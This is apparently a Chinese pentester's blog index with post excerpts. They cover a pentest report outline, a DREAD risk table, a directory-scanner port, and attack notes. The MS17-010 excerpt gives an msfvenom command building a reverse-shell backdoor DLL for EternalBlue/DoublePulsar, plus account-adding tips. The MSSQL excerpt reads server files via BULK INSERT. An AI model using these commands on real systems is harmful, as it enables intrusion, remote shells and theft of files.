简单的渗透测试报告

这份渗透测试报告是之前帮一个朋友写的, 敏感信息已经被我抠出来了, 只有框架.

1 项目概述

	1.1 渗透测试目的
	1.2 渗透测试范围
	1.3 渗透测试工具
	1.4 渗透测试组织
	1.5 渗透测试原则

2 渗透测试方法

	2.1 工具自动分析
	2.2 人工手动分析
	2.3 风险评估

3 网站漏洞详情

4 总结

	4.1 网站目前安全现状
	4.2 存在问题和整改建议	

渗透测试报告.docx

Click to read more ...

DREAD 风险评估

微软的 DREAD 模型.

高危: 12-15分, 中危: 8-11分, 低危: 0-7分.

等级 高(3) 中(2) 低(1)
Damage Potential 获取完全验证权限; 执行管理员操作; 非法上传文件 泄露敏感信息 泄露其他信息
Reproducibility 攻击者可以随意再次攻击 攻击者可以重复攻击, 但有时间限制 攻击者很难重复攻击
Exploitability 初学者在短期内能掌握攻击方法 熟练的攻击者才能完成这次攻击 漏洞利用条件非常苛刻
Affected users 所有用户, 默认配置, 关键用户 部分用户, 非默认配置 极少数用户, 匿名用户
Discoverability 漏洞很明显, 攻击条件很容易获得 在私有区域, 部分人能看到, 需要深入挖掘漏洞 发现该漏洞极其困难
Click to read more ...

digdeep python3

T00ls 一位前辈在 2013 年写的工具, 虽然比较老, 但挺好用的.

魔改了下脚本, 支持 Python3, http 请求库换成了 requests.

支持 HEAD/GET 扫描
支持自定义 404 关键字
支持自定义 Cookie
随机 User-Agent
多线程
Click to read more ...

ms17-010 attack bat

提取了 NSA 工具包里的 Eternalblue 和 Doublepulsar.

Target 分为 XP 和 WIN72K8R2.

第一次打的时候会蓝屏, 大约 10 秒后服务器重启, 打到第二次就成功了.

生成 dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > bakdoor.dll

payload 设置为 windows/x64/shell_bind_tcp 可以通过 netcat 连接, 也能用 windows/exec 直接添加账户.

Click to read more ...

mssql 读取文件

注意反斜杠转义

需要 SA 或 BULK INSERT 权限

create table test(
	context ntext
);

BULK INSERT test FROM 'c:/pass.txt'
WITH (
   DATAFILETYPE = 'char',
   KEEPNULLS
);

select * from test;

drop table test;
Click to read more ...